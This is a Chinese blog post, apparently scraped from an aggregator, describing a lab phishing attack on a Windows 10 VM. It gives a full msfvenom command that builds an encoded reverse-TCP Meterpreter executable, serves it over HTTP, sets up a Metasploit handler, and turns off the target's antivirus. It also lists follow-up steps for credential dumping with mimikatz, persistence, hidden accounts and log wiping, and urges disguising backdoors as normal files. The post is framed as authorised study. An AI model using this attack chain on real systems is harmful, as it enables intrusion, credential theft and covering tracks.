news 2026/7/13 16:42:30

钓鱼渗透测试实验复现

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
钓鱼渗透测试实验复现

钓鱼渗透测试实验复现

用途:网络安全学习分享,仅限授权环境测试

一、实验环境

角色

系统/工具

IP地址

攻击机

Windows 11(矛盾武器库)

10.0.0.166

靶机

Windows 10 x64

10.0.0.153

攻击机:Windows 11 Penetration Suite Toolkit - VMware Workstation

矛盾武器库,可以去下载

靶机:普通win10 X64

二、实验原理

本次实验采用「后门植入 + 反向连接」的经典渗透链路:

  1. MSFvenom生成带有反向 Shell 的 Payload(可执行文件)。
  2. 攻击机开启 HTTP 服务,供靶机下载 Payload。
  3. MSFconsole Handler在攻击机监听指定端口,等待靶机上线。
  4. 靶机执行 Payload后,Meterpreter 会话建立,进入后渗透阶段。

三、实验步骤

关闭靶机防火墙

互相ping网段测试链接

靶机ping攻击机

攻击机ping靶机

生成payload

攻击机使用MSF,矛盾武器库自带,无需额外下载

分为MSFvenom和MSFconsole

msfvenom = 生成 payload

msfconsole = 多模块,后续操作

先用msfvenom生成payload在桌面

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.166 LPORT=4444 -e x64/xor_dynamic -i 5 -f exe -o C:\Users\Administrator\Desktop\shell.exe

然后新开一个窗口,打开攻击机的8080端口,让靶机能够正常访问

netsh advfirewall firewall add rule name="HTTP_8080" dir=in action=allow protocol=tcp localport=8080

还有4444端口,后面也会用到

netsh advfirewall firewall add rule name="MSF_4444" dir=in action=allow protocol=tcp localport=4444

在桌面开启http服务

python3 -m http.server 8080

打开MSFconsole命令行输入banner,查看信息和各模块数量

exploit:漏洞攻击/利用模块

auxiliary:辅助模块,信息收集、扫描、嗅探、指纹识别、口令猜解

post:后渗透模块,获取目标系统的控制权以后,进行的一系列攻击动作,比如获取敏感信息、跳板攻击等

paylods:攻击代码或指令

encoders:加密模块,对payload进行加密,躲避杀毒软件的查杀

nops:提高和维持payload稳定性

evasion:高级免杀

使用模块

use exploit/multi/handler

输入show options查看信息,以下是配置信息

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 10.0.0.166

set LPORT 4444

run

正在监听,然后我们切换到靶机来访问攻击机地址并下载shell.exe

会被实时监测查杀,我们做实验环境,简单教学为主,关闭实时保护

现在下载下来执行文件

返回攻击机,可以发现已经成功连接靶机

然后进输入shell,可以运用靶机的shell窗口,输入whoami,发现我们是管理员账户,实验环境,靶机登陆的就是管理员

现在截张靶机图片

成功拿下,关闭攻击机实验开放窗口

netsh advfirewall firewall delete rule name="HTTP_8080"

netsh advfirewall firewall delete rule name="MSF_4444"

结尾:正常渗透后应该是普通用户,先进行信息搜集,再提升权限,凭证获取,权限维持,横向移动,做完清理痕迹,不做演示。

  1. 信息搜集:sysinfo、getuid、ps、ipconfig、route
  2. 权限提升:getsystem、local_exploit_suggester
  3. 凭证获取:hashdump、kiwi/mimikatz(明文密码)
  4. 权限维持:persistence、注册表后门、添加隐藏用户
  5. 横向移动:route add + socks_proxy 跳板进内网
  6. 痕迹清理:clearev、删除后门账户与文件

万变不离其宗,钓鱼的办法就是伪装正常文件或在正常文件添加后门让对方下载使用,方法多样,自行发挥。

以上仅作学习分享。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/13 16:42:07

【Atlas】 Atlas Hook 机制的工作原理是什么?

Apache Atlas 2.4.0 Hook 机制深度解析:从 Hive DDL 到元数据血缘的自动化捕获 用户问题原文:“87. Atlas Hook 机制的工作原理是什么?” 本文将深入剖析 Apache Atlas 2.4.0 中 Hook 机制 的核心工作原理。我们将以最经典的 Hive Hook 为例&…

作者头像 李华
网站建设 2026/7/13 16:41:45

Data Agent 是什么?一文讲清企业级数据智能体开发实践

很多企业的数据分析,正在变得很矛盾: 报表越来越多,答案越来越少。 经营看板、销售大屏、财务报表、项目进度表,一个都不少。 但老板真问起来: “利润为什么下降?” “哪个业务拖了后腿?” …

作者头像 李华
网站建设 2026/7/13 16:41:42

计算机毕业设计之jsp太原学院二手物品交易市场设计与实现

随着信息技术和网络技术的飞速发展,人类已进入全新信息化时代,传统管理技术已无法高效,便捷地管理信息。为了迎合时代需求,优化管理效率,各种各样的管理系统应运而生,各行各业相继进入信息管理时代&#xf…

作者头像 李华
网站建设 2026/7/13 16:40:04

Instant-NuRec在自动驾驶仿真中的应用:如何生成高质量合成数据

Instant-NuRec在自动驾驶仿真中的应用:如何生成高质量合成数据 【免费下载链接】instant-nurec 项目地址: https://ai.gitcode.com/hf_mirrors/nvidia/instant-nurec Instant-NuRec是一款由NVIDIA开发的革命性3D重建工具,它能够将一系列输入图像…

作者头像 李华
网站建设 2026/7/13 16:39:57

TorchAO v0.17.0量化实战:打造高效InternVL3-8B-da8w8模型的完整指南

TorchAO v0.17.0量化实战:打造高效InternVL3-8B-da8w8模型的完整指南 【免费下载链接】InternVL3-8B-da8w8-torchao-v0.17.0 项目地址: https://ai.gitcode.com/hf_mirrors/amd/InternVL3-8B-da8w8-torchao-v0.17.0 TorchAO v0.17.0量化实战指南将帮助你了解…

作者头像 李华
网站建设 2026/7/13 16:39:37

搞懂工作流(Workflow):从概念到落地的入门指南

一、工作流的定义与起源:从办公自动化到企业级标准1. 权威定义:不止是 “流程自动化”工作流(Workflow)的核心定义来自国际工作流管理联盟(WfMC):工作流是指业务过程的部分或整体在计算机应用环…

作者头像 李华